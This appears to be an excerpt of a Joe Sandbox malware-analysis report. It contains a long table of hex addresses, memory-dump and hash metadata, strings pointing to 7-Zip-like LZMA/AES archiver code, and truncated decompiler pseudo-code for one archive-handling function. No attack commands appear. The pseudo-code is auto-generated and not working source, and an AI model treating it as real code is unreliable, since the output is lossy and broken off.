                                                                                                                    0x00b2b3cd
                                                                                                                    0x00b2b3d1
                                                                                                                    0x00000000
                                                                                                                    0x00b2b3d1
                                                                                                                    0x00b2b3b9
                                                                                                                    0x00b2b3bc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2b3bc
                                                                                                                    0x00b2b38e
                                                                                                                    0x00b2b398
                                                                                                                    0x00b2b3a0
                                                                                                                    0x00b2b3a0
                                                                                                                    0x00b2b3a0
                                                                                                                    0x00000000
                                                                                                                    0x00b2b3a0
                                                                                                                    0x00000000
                                                                                                                    0x00b2b35a
                                                                                                                    0x00b2b362
                                                                                                                    0x00b2b372
                                                                                                                    0x00b2b374
                                                                                                                    0x00b2b376
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2b376
                                                                                                                    0x00b2b2b3
                                                                                                                    0x00b2b2b3
                                                                                                                    0x00b2b2bb
                                                                                                                    0x00b2b2bb
                                                                                                                    0x00b2b2bb
                                                                                                                    0x00b2b2bb
                                                                                                                    0x00b2b2bf
                                                                                                                    0x00000000
                                                                                                                    0x00b2b2bf
                                                                                                                    0x00b2b2b5
                                                                                                                    0x00b2b2b9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2b2b9
                                                                                                                    0x00b2b2b1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2b1c4
                                                                                                                    0x00b2b1c4
                                                                                                                    0x00b2b1d6
                                                                                                                    0x00b2b1db
                                                                                                                    0x00b2b1de
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2b1e0
                                                                                                                    0x00b2b1e7
                                                                                                                    0x00b2b1ed
                                                                                                                    0x00b2b1f5
                                                                                                                    0x00b2b1f6
                                                                                                                    0x00b2b1fb
                                                                                                                    0x00b2b1fd
                                                                                                                    0x00b2b203
                                                                                                                    0x00b2b209
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2b20b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2b20d
                                                                                                                    0x00b2b210
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2b210
                                                                                                                    0x00b2b1e2
                                                                                                                    0x00b2b1e5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2b1e5
                                                                                                                    0x00000000
                                                                                                                    0x00b2b1c4
                                                                                                                    0x00b2b165
                                                                                                                    0x00b2b16d
                                                                                                                    0x00b2b171
                                                                                                                    0x00b2b17d
                                                                                                                    0x00b2b183
                                                                                                                    0x00b2b186
                                                                                                                    0x00b2b18d
                                                                                                                    0x00b2b194
                                                                                                                    0x00b2b196
                                                                                                                    0x00b2b19d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2abf3
                                                                                                                    0x00b2abf3
                                                                                                                    0x00b2abfb
                                                                                                                    0x00b2ac02
                                                                                                                    0x00b2ac0a
                                                                                                                    0x00b2ac12
                                                                                                                    0x00b2ac17
                                                                                                                    0x00b2ac1c
                                                                                                                    0x00b2ac1e
                                                                                                                    0x00b2acfb
                                                                                                                    0x00b2ad02
                                                                                                                    0x00b2ad09
                                                                                                                    0x00b2ad0f
                                                                                                                    0x00b2ad12
                                                                                                                    0x00b2ad16
                                                                                                                    0x00b2ad1e
                                                                                                                    0x00b2ad21
                                                                                                                    0x00b2ad21
                                                                                                                    0x00b2ad2e
                                                                                                                    0x00b2ad33
                                                                                                                    0x00b2ad35
                                                                                                                    0x00b2ad93
                                                                                                                    0x00b2ad98
                                                                                                                    0x00b2ad9a
                                                                                                                    0x00b2ade6
                                                                                                                    0x00b2adeb
                                                                                                                    0x00b2aded
                                                                                                                    0x00b2ae51
                                                                                                                    0x00b2ae56
                                                                                                                    0x00b2ae58
                                                                                                                    0x00b2aedf
                                                                                                                    0x00b2aee4
                                                                                                                    0x00b2aee6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2aef4
                                                                                                                    0x00b2aef9
                                                                                                                    0x00b2aefb
                                                                                                                    0x00b2af43
                                                                                                                    0x00b2af48
                                                                                                                    0x00b2af4a
                                                                                                                    0x00b2afba
                                                                                                                    0x00b2afbf
                                                                                                                    0x00b2afc4
                                                                                                                    0x00b2afc6
                                                                                                                    0x00b2b05b
                                                                                                                    0x00b2b060
                                                                                                                    0x00b2b062
                                                                                                                    0x00b2b0f7
                                                                                                                    0x00b2b0fb
                                                                                                                    0x00b2b0fc
                                                                                                                    0x00b2b101
                                                                                                                    0x00b2b103
                                                                                                                    0x00b2b148
                                                                                                                    0x00000000
                                                                                                                    0x00b2b148
                                                                                                                    0x00000000
                                                                                                                    0x00b2b105
                                                                                                                    0x00b2b072
                                                                                                                    0x00b2b07f
                                                                                                                    0x00b2b081
                                                                                                                    0x00b2b085
                                                                                                                    0x00b2b08a
                                                                                                                    0x00b2b08c
                                                                                                                    0x00b2b0d9
                                                                                                                    0x00b2b0d9
                                                                                                                    0x00b2b0dc
                                                                                                                    0x00b2b0e0
                                                                                                                    0x00b2b0e0
                                                                                                                    0x00000000
                                                                                                                    0x00b2b0e5
                                                                                                                    0x00b2b08e
                                                                                                                    0x00b2b091
                                                                                                                    0x00b2b0ae
                                                                                                                    0x00b2b0b1
                                                                                                                    0x00b2b0b5
                                                                                                                    0x00b2b0bb
                                                                                                                    0x00b2b0bf
                                                                                                                    0x00b2b0c0
                                                                                                                    0x00b2b0ce
                                                                                                                    0x00b2b0d0
                                                                                                                    0x00b2b0d3
                                                                                                                    0x00b2b0d5
                                                                                                                    0x00b2b140
                                                                                                                    0x00000000
                                                                                                                    0x00b2b145
                                                                                                                    0x00000000
                                                                                                                    0x00b2b0d7
                                                                                                                    0x00b2b093
                                                                                                                    0x00b2b09b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2b0a3
                                                                                                                    0x00b2b0aa
                                                                                                                    0x00b2b0ac
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2b0ac
                                                                                                                    0x00b2afd2
                                                                                                                    0x00b2afd5
                                                                                                                    0x00b2afdd
                                                                                                                    0x00b2afe6
                                                                                                                    0x00b2afef
                                                                                                                    0x00b2aff1
                                                                                                                    0x00b2affb
                                                                                                                    0x00b2b000
                                                                                                                    0x00b2b003
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2b009
                                                                                                                    0x00b2b00c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2b01c
                                                                                                                    0x00b2b021
                                                                                                                    0x00b2b023
                                                                                                                    0x00b2b026
                                                                                                                    0x00b2b029
                                                                                                                    0x00b2b038
                                                                                                                    0x00b2b03a
                                                                                                                    0x00b2b042
                                                                                                                    0x00b2b04b
                                                                                                                    0x00b2b04b
                                                                                                                    0x00000000
                                                                                                                    0x00b2b029
                                                                                                                    0x00b2af4f
                                                                                                                    0x00b2af5a
                                                                                                                    0x00b2af63
                                                                                                                    0x00b2af6c
                                                                                                                    0x00b2af71
                                                                                                                    0x00b2af76
                                                                                                                    0x00b2af79
                                                                                                                    0x00000000
                                                                                                                    0x00b2af7f
                                                                                                                    0x00b2af7f
                                                                                                                    0x00b2af85
                                                                                                                    0x00b2af87
                                                                                                                    0x00b2af8d
                                                                                                                    0x00b2af90
                                                                                                                    0x00b2afa1
                                                                                                                    0x00b2afac
                                                                                                                    0x00b2afac
                                                                                                                    0x00b2af90
                                                                                                                    0x00000000
                                                                                                                    0x00b2af87
                                                                                                                    0x00b2af79
                                                                                                                    0x00b2af03
                                                                                                                    0x00b2af0e
                                                                                                                    0x00b2af17
                                                                                                                    0x00b2af20
                                                                                                                    0x00b2af28
                                                                                                                    0x00b2af2d
                                                                                                                    0x00b2af30
                                                                                                                    0x00000000
                                                                                                                    0x00b2af36
                                                                                                                    0x00000000
                                                                                                                    0x00b2af36
                                                                                                                    0x00b2ae5a
                                                                                                                    0x00b2ae5a
                                                                                                                    0x00b2ae5e
                                                                                                                    0x00b2ae64
                                                                                                                    0x00b2ae6f
                                                                                                                    0x00b2ae78
                                                                                                                    0x00b2ae81
                                                                                                                    0x00b2ae89
                                                                                                                    0x00b2ae8e
                                                                                                                    0x00b2ae91
                                                                                                                    0x00b2b14a
                                                                                                                    0x00b2b150
                                                                                                                    0x00b2b121
                                                                                                                    0x00b2b121
                                                                                                                    0x00000000
                                                                                                                    0x00b2b121
                                                                                                                    0x00b2ae97
                                                                                                                    0x00b2ae9e
                                                                                                                    0x00b2b157
                                                                                                                    0x00b2b157
                                                                                                                    0x00000000
                                                                                                                    0x00b2aea4
                                                                                                                    0x00b2aea4
                                                                                                                    0x00b2aea8
                                                                                                                    0x00b2aeae
                                                                                                                    0x00000000
                                                                                                                    0x00b2aeae
                                                                                                                    0x00b2ae9e
                                                                                                                    0x00b2ae58
                                                                                                                    0x00b2adf5
                                                                                                                    0x00b2ae09
                                                                                                                    0x00b2ae12
                                                                                                                    0x00b2ae1a
                                                                                                                    0x00b2ae1f
                                                                                                                    0x00b2ae22
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2ae28
                                                                                                                    0x00b2ae2e
                                                                                                                    0x00b2ae31
                                                                                                                    0x00000000
                                                                                                                    0x00b2ae37
                                                                                                                    0x00b2ae39
                                                                                                                    0x00b2ae3b
                                                                                                                    0x00b2ae41
                                                                                                                    0x00b2ae44
                                                                                                                    0x00000000
                                                                                                                    0x00b2ae44
                                                                                                                    0x00b2ae31
                                                                                                                    0x00b2ada2
                                                                                                                    0x00b2adad
                                                                                                                    0x00b2adb6
                                                                                                                    0x00b2adbf
                                                                                                                    0x00b2adc7
                                                                                                                    0x00b2adcc
                                                                                                                    0x00b2adcf
                                                                                                                    0x00000000
                                                                                                                    0x00b2add5
                                                                                                                    0x00b2add5
                                                                                                                    0x00000000
                                                                                                                    0x00b2add5
                                                                                                                    0x00b2adcf
                                                                                                                    0x00b2ad3d
                                                                                                                    0x00b2ad48
                                                                                                                    0x00b2ad51
                                                                                                                    0x00b2ad5a
                                                                                                                    0x00b2ad62
                                                                                                                    0x00b2ad67
                                                                                                                    0x00b2ad6a
                                                                                                                    0x00000000
                                                                                                                    0x00b2ad70
                                                                                                                    0x00b2ad76
                                                                                                                    0x00b2ad80
                                                                                                                    0x00000000
                                                                                                                    0x00b2ad80
                                                                                                                    0x00b2ad6a
                                                                                                                    0x00b2ac24
                                                                                                                    0x00b2ac27
                                                                                                                    0x00b2b10a
                                                                                                                    0x00000000
                                                                                                                    0x00b2b10a
                                                                                                                    0x00b2ac2d
                                                                                                                    0x00b2ac34
                                                                                                                    0x00b2ac44
                                                                                                                    0x00b2ac48
                                                                                                                    0x00b2ac4d
                                                                                                                    0x00b2ac4f
                                                                                                                    0x00b2b130
                                                                                                                    0x00b2b135
                                                                                                                    0x00b2b116
                                                                                                                    0x00b2b11c
                                                                                                                    0x00000000
                                                                                                                    0x00b2b11c
                                                                                                                    0x00b2ac5f
                                                                                                                    0x00b2ac64
                                                                                                                    0x00b2ac66
                                                                                                                    0x00000000
                                                                                                                    0x00b2ac6c
                                                                                                                    0x00b2ac6c
                                                                                                                    0x00b2ac6e
                                                                                                                    0x00b2ac79
                                                                                                                    0x00b2ac7b
                                                                                                                    0x00b2ac7b
                                                                                                                    0x00b2ac85
                                                                                                                    0x00b2ac8e
                                                                                                                    0x00b2ac8e
                                                                                                                    0x00b2ac91
                                                                                                                    0x00b2ac96
                                                                                                                    0x00b2ac98
                                                                                                                    0x00b2b111
                                                                                                                    0x00b2b111
                                                                                                                    0x00000000
                                                                                                                    0x00b2b111
                                                                                                                    0x00b2ac9e
                                                                                                                    0x00b2aca1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2acab
                                                                                                                    0x00b2acb0
                                                                                                                    0x00b2acb2
                                                                                                                    0x00b2acbd
                                                                                                                    0x00b2acce
                                                                                                                    0x00b2acd2
                                                                                                                    0x00b2acd7
                                                                                                                    0x00b2acd9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2acdf
                                                                                                                    0x00b2ace5
                                                                                                                    0x00b2b139
                                                                                                                    0x00000000
                                                                                                                    0x00b2aceb
                                                                                                                    0x00b2acf1
                                                                                                                    0x00000000
                                                                                                                    0x00b2acf1
                                                                                                                    0x00b2ace5
                                                                                                                    0x00b2acb4
                                                                                                                    0x00b2acb7
                                                                                                                    0x00b2b129
                                                                                                                    0x00000000
                                                                                                                    0x00b2b129
                                                                                                                    0x00000000
                                                                                                                    0x00b2acb7
                                                                                                                    0x00b2aeb3
                                                                                                                    0x00b2aeb6
                                                                                                                    0x00b2aeba
                                                                                                                    0x00b2aebf
                                                                                                                    0x00b2aec6
                                                                                                                    0x00b2aec9
                                                                                                                    0x00b2aec9
                                                                                                                    0x00000000
                                                                                                                    0x00b2abf3
                                                                                                                    0x00b2ab4b
                                                                                                                    0x00b2ab4e
                                                                                                                    0x00b2ab51
                                                                                                                    0x00b2ab54
                                                                                                                    0x00b2abd3
                                                                                                                    0x00b2abd3
                                                                                                                    0x00b2abd6
                                                                                                                    0x00b2abd9
                                                                                                                    0x00b2abdd
                                                                                                                    0x00b2abdf
                                                                                                                    0x00b2abdf
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2ab56
                                                                                                                    0x00b2ab56
                                                                                                                    0x00b2ab63
                                                                                                                    0x00b2ab6a
                                                                                                                    0x00b2ab71
                                                                                                                    0x00b2ab78
                                                                                                                    0x00b2ab7d
                                                                                                                    0x00b2ab81
                                                                                                                    0x00b2ab83
                                                                                                                    0x00b2ab8a
                                                                                                                    0x00b2ab8f
                                                                                                                    0x00b2ab93
                                                                                                                    0x00b2ab9e
                                                                                                                    0x00b2aba6
                                                                                                                    0x00b2abad
                                                                                                                    0x00b2abb2
                                                                                                                    0x00b2abb6
                                                                                                                    0x00b2abb8
                                                                                                                    0x00b2abbf
                                                                                                                    0x00b2abc4
                                                                                                                    0x00b2abc5
                                                                                                                    0x00b2abc8
                                                                                                                    0x00b2abcb
                                                                                                                    0x00b2abce
                                                                                                                    0x00b2abce
                                                                                                                    0x00000000
                                                                                                                    0x00b2ab56
                                                                                                                    0x00b2aaa6
                                                                                                                    0x00b2aaab
                                                                                                                    0x00b2aaad
                                                                                                                    0x00000000
                                                                                                                    0x00b2aaaf
                                                                                                                    0x00b2aab5
                                                                                                                    0x00000000
                                                                                                                    0x00b2aab5
                                                                                                                    0x00b2aa66
                                                                                                                    0x00b2aa66
                                                                                                                    0x00b2cce6
                                                                                                                    0x00b2ccec
                                                                                                                    0x00b2ccf4
                                                                                                                    0x00b2ccf4

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B2AA4A
                                                                                                                      • Part of subcall function 00B2DB91: __EH_prolog.LIBCMT ref: 00B2DB96
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID: $ $ $ (Cmplx)$*$@$@$AES128$AES192$Avg:$Avr:$CPU$CPU hardware threads:$CRC$Compressing$Decompressing$Dict$Dictionary reduced to: $E/U$Effec$KiB/s$LZMA$MB/s$MIPS$Method$R/U$Rating$Size$Speed$T CPU Freq (MHz):$THRD$Tot:$Usage$crc32$file$file size =$freq$freq=$hash$mts$size: $tic$time$timems
                                                                                                                    • API String ID: 3519838083-768847781
                                                                                                                    • Opcode ID: c1ac9ecc76de1e81d68df563ed7c0058dd181ff912757e9a37f6a2878701c7e3
                                                                                                                    • Instruction ID: d5fc70edd2b9b4e3f362d78e2df419d29029c5caf1353976c498d01aaf763f73
                                                                                                                    • Opcode Fuzzy Hash: c1ac9ecc76de1e81d68df563ed7c0058dd181ff912757e9a37f6a2878701c7e3
                                                                                                                    • Instruction Fuzzy Hash: 293337319002299FDF25EBA4D895BEDBBF1EF49300F1480E9E509AB291DB709E85CF51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B3E6A7 Relevance: 63.2, APIs: 15, Strings: 20, Instructions: 1923timelibraryloaderCOMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 93%
                                                                                                                    			E00B3E6A7(intOrPtr __ecx, struct HINSTANCE__* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t984;
				signed int _t1005;
				signed int _t1007;
				signed int _t1015;
				char _t1019;
				signed int _t1044;
				signed int _t1064;
				void* _t1066;
				signed char _t1076;
				signed int _t1077;
				signed int _t1081;
				signed int _t1083;
				signed int _t1086;
				signed int _t1089;
				signed int _t1091;
				signed int _t1101;
				signed int _t1102;
				_Unknown_base(*)()* _t1104;
				_Unknown_base(*)()* _t1105;
				intOrPtr _t1127;
				intOrPtr* _t1135;
				void* _t1140;
				void* _t1142;
				void* _t1144;
				void* _t1148;
				signed int _t1151;
				intOrPtr _t1186;
				long _t1194;
				void* _t1205;
				void* _t1232;
				signed int _t1235;
				signed int _t1254;
				intOrPtr* _t1277;
				intOrPtr _t1278;
				void* _t1289;
				void* _t1290;
				signed int _t1293;
				void* _t1327;
				signed int _t1338;
				void* _t1342;
				void* _t1352;
				intOrPtr* _t1377;
				signed int _t1380;
				void* _t1387;
				void* _t1397;
				void* _t1401;
				signed int _t1407;
				void* _t1411;
				void _t1413;
				void* _t1418;
				void* _t1425;
				void* _t1441;
				void* _t1442;
				void* _t1461;
				signed int _t1463;
				signed int _t1468;
				signed int _t1470;
				signed int _t1497;
				signed int _t1498;
				signed int _t1511;
				void* _t1528;
				void* _t1547;
				struct HINSTANCE__* _t1551;
				void* _t1578;
				intOrPtr* _t1758;
				signed int _t1773;
				void* _t1777;
				intOrPtr _t1782;
				void* _t1832;
				intOrPtr* _t1842;
				signed int _t1844;
				signed int _t1847;
				signed int _t1849;
				signed int _t1851;
				intOrPtr* _t1852;
				signed int _t1855;
				int _t1857;
				signed int* _t1860;
				signed int _t1861;
				signed int _t1862;
				signed int _t1863;
				signed int* _t1864;
				signed int* _t1865;
				intOrPtr _t1866;
				signed int _t1868;
				signed int* _t1869;
				signed int _t1871;
				void* _t1872;
				signed int _t1873;
				void* _t1874;
				signed int _t1875;
				signed int _t1884;
				signed int _t1885;
				struct HINSTANCE__* _t1886;
				signed int _t1888;
				signed int _t1889;
				void* _t1890;
				signed int _t1891;
				void* _t1893;
				void* _t1894;
				void* _t1895;
				void* _t1896;
				signed int _t1897;
				void* _t1900;
				void* _t1902;
				intOrPtr* _t1903;

				_t1833 = __edx;
				L00B7F140(0xb85ace, _t1900);
				_t1903 = _t1902 - 0x2f4;
				_t1470 =  *(_t1900 + 0x10);
				 *((intOrPtr*)(_t1900 - 0x10)) = _t1903;
				 *(_t1900 - 0xb8) = __edx;
				 *((intOrPtr*)(_t1900 - 0x68)) = __ecx;
				if( *((char*)(_t1470 + 6)) == 0 ||  *((char*)(_t1470 + 7)) == 0) {
					_t1844 = 1;
					if( *((intOrPtr*)(_t1833 + 4)) > _t1844) {
						L72:
						_t984 = 0x80004001;
						goto L271;
					}
					 *(_t1900 + 0x13) =  *((intOrPtr*)(_t1470 + 0xf0)) != 0;
					if( *(_t1900 + 0x13) == 0 ||  *(_t1470 + 0x5c) == _t1844) {
						__eflags =  *(_t1470 + 9);
						if( *(_t1470 + 9) == 0) {
							L11:
							E00B14EB5( *(_t1900 + 0xc), _t1900,  *(_t1470 + 0x1c));
							E00B308D0( *(_t1900 + 0xc));
							L00B14E6A( *(_t1900 + 0xc));
							__eflags =  *(_t1470 + 0xfc);
							if( *(_t1470 + 0xfc) <= 0) {
								L13:
								__eflags =  *(_t1470 + 1);
								if( *(_t1470 + 1) == 0) {
									L24:
									L00B31908(_t1900 - 0x1ac);
									__eflags =  *(_t1900 + 0x20);
									_t1884 = 5;
									 *(_t1900 - 4) = _t1884;
									if(__eflags == 0) {
										L28:
										_t1846 = _t1470 + 0x64;
										_push(_t1900 - 0x58);
										E00B3E1FE(_t1470 + 0x64, _t1833, __eflags);
										__eflags =  *(_t1470 + 0xfc);
										 *(_t1900 - 4) = 6;
										if(__eflags != 0) {
											_t1441 = E00B3E27E(_t1846, _t1833, __eflags);
											 *(_t1900 - 4) = 7;
											_t1442 = L00B12F78(_t1900 - 0x58, _t1441);
											 *(_t1900 - 4) = 6;
											E00B11E89(_t1442,  *(_t1900 - 0x28));
											 *_t1903 = ".001";
											L00B131AD(_t1900 - 0x58, _t1900 - 0x28);
										}
										_t1847 =  *(_t1900 + 8);
										__eflags =  *(_t1847 + 4);
										if( *(_t1847 + 4) != 0) {
											L33:
											E00B16529(_t1900 - 0xfc);
											E00B12D90(_t1900 - 0xd4);
											_push(1);
											_push( *(_t1900 - 0x58));
											 *(_t1900 - 4) = 8;
											_t993 = E00B169AB(_t1900 - 0xfc);
											__eflags = _t993;
											if(_t993 != 0) {
												_t995 =  *(_t1900 - 0xdc) >> 4;
												__eflags =  *(_t1900 - 0xdc) >> 0x00000004 & 0x00000001;
												if(__eflags == 0) {
													__eflags =  *((char*)(_t1900 - 0xd7));
													if( *((char*)(_t1900 - 0xd7)) == 0) {
														__eflags =  *((char*)(_t1470 + 6));
														if( *((char*)(_t1470 + 6)) != 0) {
															L48:
															__eflags =  *(_t1470 + 0xfc);
															if( *(_t1470 + 0xfc) <= 0) {
																E00B56896(_t1900 - 0x74);
																__eflags =  *((char*)(_t1470 + 0x20));
																 *(_t1900 - 4) = 9;
																if( *((char*)(_t1470 + 0x20)) != 0) {
																	E00B56B33(_t1900 - 0x74);
																	E00B320FC(_t1900 - 0x74, _t1847, _t1884, _t1470 + 0x28);
																}
																 *(_t1900 - 0x1c) = 0;
																 *(_t1900 - 0x18) = 0;
																 *((intOrPtr*)(_t1900 - 0x14)) = 0;
																 *(_t1900 - 4) = 0xa;
																L00B31871(_t1900 - 0x300);
																 *(_t1900 - 0x2bc) =  *(_t1900 - 0x2bc) & 0x00000000;
																 *((intOrPtr*)(_t1900 - 0x2c0)) = _t1470 + 0x48;
																 *((intOrPtr*)(_t1900 - 0x300)) =  *((intOrPtr*)(_t1900 - 0x68));
																 *((intOrPtr*)(_t1900 - 0x2d8)) = _t1900 - 0x74;
																 *((intOrPtr*)(_t1900 - 0x2d4)) = _t1900 - 0x1c;
																 *(_t1900 - 4) = 0xb;
																 *((intOrPtr*)(_t1900 - 0x2d0)) = 0;
																L00B12F78(_t1900 - 0x2b8, _t1900 - 0x58);
																_t1885 =  *(_t1900 + 0x1c);
																_t1005 =  *((intOrPtr*)( *_t1885 + 0x48))( *(_t1900 - 0x58));
																__eflags = _t1005;
																if(__eflags == 0) {
																	_t1007 = L00B3CAC1(_t1900 - 0x1ac, __eflags, _t1900 - 0x300,  *(_t1900 + 0x18));
																	_t1849 = _t1007;
																	__eflags = _t1849;
																	if(_t1849 != 0) {
																		L57:
																		_t1005 = 0x80004004;
																		__eflags = _t1849 - 0x80004004;
																		if(_t1849 == 0x80004004) {
																			goto L53;
																		}
																		L58:
																		_t1005 =  *((intOrPtr*)( *_t1885 + 0x3c))( *((intOrPtr*)(_t1900 - 0x68)), _t1900 - 0x1ac,  *(_t1900 - 0x58), _t1849);
																		__eflags = _t1005;
																		if(_t1005 != 0) {
																			goto L53;
																		}
																		__eflags = _t1849;
																		if(_t1849 != 0) {
																			goto L62;
																		}
																		__eflags =  *((intOrPtr*)(_t1900 - 0x19c)) - 1;
																		if( *((intOrPtr*)(_t1900 - 0x19c)) <= 1) {
																			_t1497 =  *(_t1900 - 0x1ac);
																			__eflags =  *((char*)(_t1900 - 0xd7));
																			_t1015 =  *((intOrPtr*)(_t1497 +  *(_t1900 - 0x1a8) * 4 - 4));
																			_t1498 = _t1497 & 0xffffff00 |  *((char*)(_t1900 - 0xd7)) == 0x00000000;
																			__eflags = _t1498;
																			 *(_t1015 + 0x4f) = _t1498;
																			if(_t1498 != 0) {
																				 *(_t1015 + 0x44) =  *(_t1900 - 0xe4);
																				_t160 = _t1015 + 0x4e;
																				 *_t160 =  *(_t1015 + 0x4e) & 0x00000000;
																				__eflags =  *_t160;
																				 *((intOrPtr*)(_t1015 + 0x48)) =  *((intOrPtr*)(_t1900 - 0xe0));
																				 *((short*)(_t1015 + 0x4c)) = 0x17;
																			}
																			__eflags =  *((char*)(_t1015 + 0x78));
																			if( *((char*)(_t1015 + 0x78)) == 0) {
																				__eflags =  *(_t1470 + 0x28);
																				if(__eflags >= 0) {
																					L73:
																					E00B11E89(E00B11E89(_t1015,  *((intOrPtr*)(_t1900 - 0x2b8))),  *(_t1900 - 0x1c));
																					 *(_t1900 - 4) = 8;
																					_t993 = E00B32046(_t1900 - 0x74);
																					L75:
																					 *(_t1900 - 4) = 6;
																					E00B11E89(_t993,  *((intOrPtr*)(_t1900 - 0xd4)));
																					L77:
																					__eflags =  *(_t1470 + 0x28);
																					if( *(_t1470 + 0x28) >= 0) {
																						L80:
																						_t1019 =  *((intOrPtr*)(_t1900 - 0x18c));
																						__eflags = _t1019;
																						 *((char*)(_t1900 + 0x23)) = _t1019;
																						if(_t1019 != 0) {
																							L83:
																							E00B2EFE3(_t1900 - 0x24c);
																							asm("sbb eax, eax");
																							 *(_t1900 - 4) = 0xd;
																							 *(_t1900 - 0x1b4) =  ~_t1885 & _t1885 + 0x00000004;
																							L00B3312E(_t1900 - 0x29c, __eflags);
																							__eflags =  *((char*)(_t1470 + 5));
																							 *(_t1900 - 4) = 0xe;
																							 *(_t1900 + 0x18) = 0;
																							if(__eflags == 0) {
																								 *(_t1900 + 0xb) =  *(_t1900 + 0xb) & 0x00000000;
																								__eflags =  *(_t1900 + 0x13);
																								if( *(_t1900 + 0x13) != 0) {
																									L112:
																									E00B12D90(_t1900 - 0xb4);
																									 *(_t1900 + 0xb) =  *(_t1900 + 0xb) & 0x00000000;
																									 *(_t1900 - 0x9c) =  *(_t1900 - 0x9c) & 0x00000000;
																									 *(_t1900 - 4) = 0x13;
																									E00B12D90(_t1900 - 0x98);
																									__eflags =  *((char*)(_t1470 + 7));
																									 *(_t1900 - 4) = 0x14;
																									if( *((char*)(_t1470 + 7)) != 0) {
																										__eflags =  *((char*)(_t1470 + 8));
																										if(__eflags != 0) {
																											_push( *0xb8bc28);
																											E00B16458(_t1900 - 0x9c, __eflags);
																											L00B12F78(_t1900 - 0xb4, _t1900 - 0x98);
																											E00B182BD(_t1900 - 0xb4);
																											 *(_t1900 + 0xb) = 1;
																										}
																									}
																									E00B56896(_t1900 - 0x44);
																									 *(_t1900 + 0x13) =  *(_t1900 + 0x13) & 0x00000000;
																									__eflags =  *((char*)(_t1470 + 6));
																									 *(_t1900 - 4) = 0x15;
																									if( *((char*)(_t1470 + 6)) != 0) {
																										L125:
																										__eflags =  *(_t1470 + 9);
																										if( *(_t1470 + 9) == 0) {
																											L134:
																											_t1886 = 0;
																											_t1851 = 0;
																											__eflags =  *(_t1470 + 0x5c);
																											if( *(_t1470 + 0x5c) <= 0) {
																												L144:
																												E00B56896(_t1900 - 0xa8);
																												__eflags =  *((char*)(_t1900 + 0x23));
																												 *(_t1900 - 4) = 0x1c;
																												if(__eflags == 0) {
																													L152:
																													 *(_t1900 - 0x4c) = _t1886;
																													 *(_t1900 - 0x48) = _t1886;
																													__eflags =  *(_t1470 + 9);
																													 *(_t1900 - 4) = 0x1f;
																													if( *(_t1470 + 9) == 0) {
																														L155:
																														E00B56896(_t1900 - 0x8c);
																														__eflags =  *(_t1470 + 0x5c) - _t1886;
																														 *(_t1900 - 4) = 0x20;
																														 *(_t1900 + 0xc) = _t1886;
																														if( *(_t1470 + 0x5c) <= _t1886) {
																															L170:
																															__eflags =  *((char*)(_t1900 + 0x23));
																															if( *((char*)(_t1900 + 0x23)) == 0) {
																																L177:
																																_t1511 = 0;
																																__eflags =  *((intOrPtr*)(_t1900 - 0x88)) - _t1886;
																																if( *((intOrPtr*)(_t1900 - 0x88)) <= _t1886) {
																																	L181:
																																	_t1849 = E00B40338(_t1900 - 0x8c, _t1833);
																																	__eflags = _t1849 - _t1886;
																																	if(_t1849 == _t1886) {
																																		E00B36CB9(_t1900 - 0x44);
																																		__eflags =  *(_t1900 + 0x13);
																																		if(__eflags == 0) {
																																			L195:
																																			__eflags =  *((char*)(_t1470 + 7));
																																			if(__eflags == 0) {
																																				L239:
																																				__eflags =  *(_t1470 + 9);
																																				if( *(_t1470 + 9) == 0) {
																																					L270:
																																					 *(_t1900 - 4) = 0x1f;
																																					L00B41A29(_t1900 - 0x8c);
																																					 *(_t1900 - 4) = 0x1c;
																																					E00B20C00(_t1900 - 0x4c);
